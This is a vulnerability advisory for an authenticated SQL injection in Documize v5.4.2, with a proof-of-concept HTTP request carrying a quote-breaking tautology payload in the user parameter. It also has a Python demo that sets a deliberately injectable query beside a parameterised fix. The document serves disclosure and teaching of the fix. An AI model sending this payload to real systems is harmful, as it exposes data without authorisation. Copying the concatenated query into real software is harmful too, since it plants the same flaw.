usd-2022-0066 | Documize v5.4.2 (221021105923) - SQL Injection

Advisory ID: usd-2022-0066
Product: Documize
Affected Version: v5.4.2 (221021105923)
Vulnerability Type: SQL Injection (CWE-89)
Security Risk: Critical
Vendor URL: https://www.documize.com
Vendor Status: Not fixed
CVE number: CVE-2023-23634

Description

The user parameter of the /api/dashboard/activity endpoint is not safely separated from the SQL query it ends up in, which allows SQL injection by an authenticated caller.

Proof of Concept

The following request was used to inject into the SQL query through the user parameter. The URL-encoded value decodes to invalid' or '1'='1, the classic quote-breaking tautology payload; the authorization header shows that a valid session token was sent with the request.

GET /api/dashboard/activity?days=1&user=invalid'%20or%20'1'%3d'1&activity=0 HTTP/1.1
Host: localhost:5001
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
authorization: ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.99 Safari/537.36
[...]

Fix

It is recommended to pass the value of the user parameter to the database as a bound parameter of a prepared statement instead of embedding it in the query text, and to review the other parameters of the same endpoint (days, activity) for the same pattern.
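To make the mechanism behind the request in the Proof of Concept and the recommended fix concrete, the following added example (this is not Documize's code; the table, its rows and the column names are constructed, and an in-memory SQLite database stands in for the real one) decodes the user value from the PoC query string, runs it through a query that concatenates it into the SQL text, and then through the same query with the value bound as a prepared-statement parameter.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed sample data standing in for whatever schema Documize really uses.
ROWS = [
    ("alice", "2022-12-01", "view"),
    ("alice", "2022-12-02", "edit"),
    ("bob",   "2022-12-01", "view"),
    ("carol", "2022-12-03", "delete"),
]

# Query string copied from the PoC request; parse_qs URL-decodes the values.
POC_QUERY = "days=1&user=invalid'%20or%20'1'%3d'1&activity=0"
PAYLOAD = parse_qs(POC_QUERY)["user"][0]   # -> invalid' or '1'='1


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE activity (user TEXT, day TEXT, action TEXT)")
    conn.executemany("INSERT INTO activity VALUES (?, ?, ?)", ROWS)
    return conn


def activity_vulnerable(conn, user):
    # CWE-89 pattern: the untrusted value becomes part of the SQL text, so a
    # single quote inside it terminates the literal and the rest is parsed
    # as SQL. With PAYLOAD the filter reads: user = 'invalid' or '1'='1'
    sql = ("SELECT user, day, action FROM activity WHERE user = '"
           + user + "' ORDER BY day")
    return conn.execute(sql).fetchall()


def activity_fixed(conn, user):
    # Prepared statement: the value is sent as a bound parameter and can never
    # change the structure of the statement, whatever characters it contains.
    sql = "SELECT user, day, action FROM activity WHERE user = ? ORDER BY day"
    return conn.execute(sql, (user,)).fetchall()


def demo():
    conn = make_db()
    return {
        "vulnerable": activity_vulnerable(conn, PAYLOAD),  # every row leaks
        "fixed": activity_fixed(conn, PAYLOAD),            # no such user
        "fixed_legit": activity_fixed(conn, "alice"),      # normal use still works
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {len(rows)} row(s) {rows}")
```

The vulnerable variant returns every row in the table for the PoC payload, while the parameterised variant returns nothing for it and still returns the correct rows for a legitimate user name, which is the behaviour change a fix for this advisory should show.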

Timeline

  • 2022-12-16: First contact request via mail
  • 2023-01-09: Second contact request via mail
  • 2023-01-16: Try to contact vendor again
  • 2023-02-02: Try to contact vendor again
  • 2023-12-22: Publish advisory

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.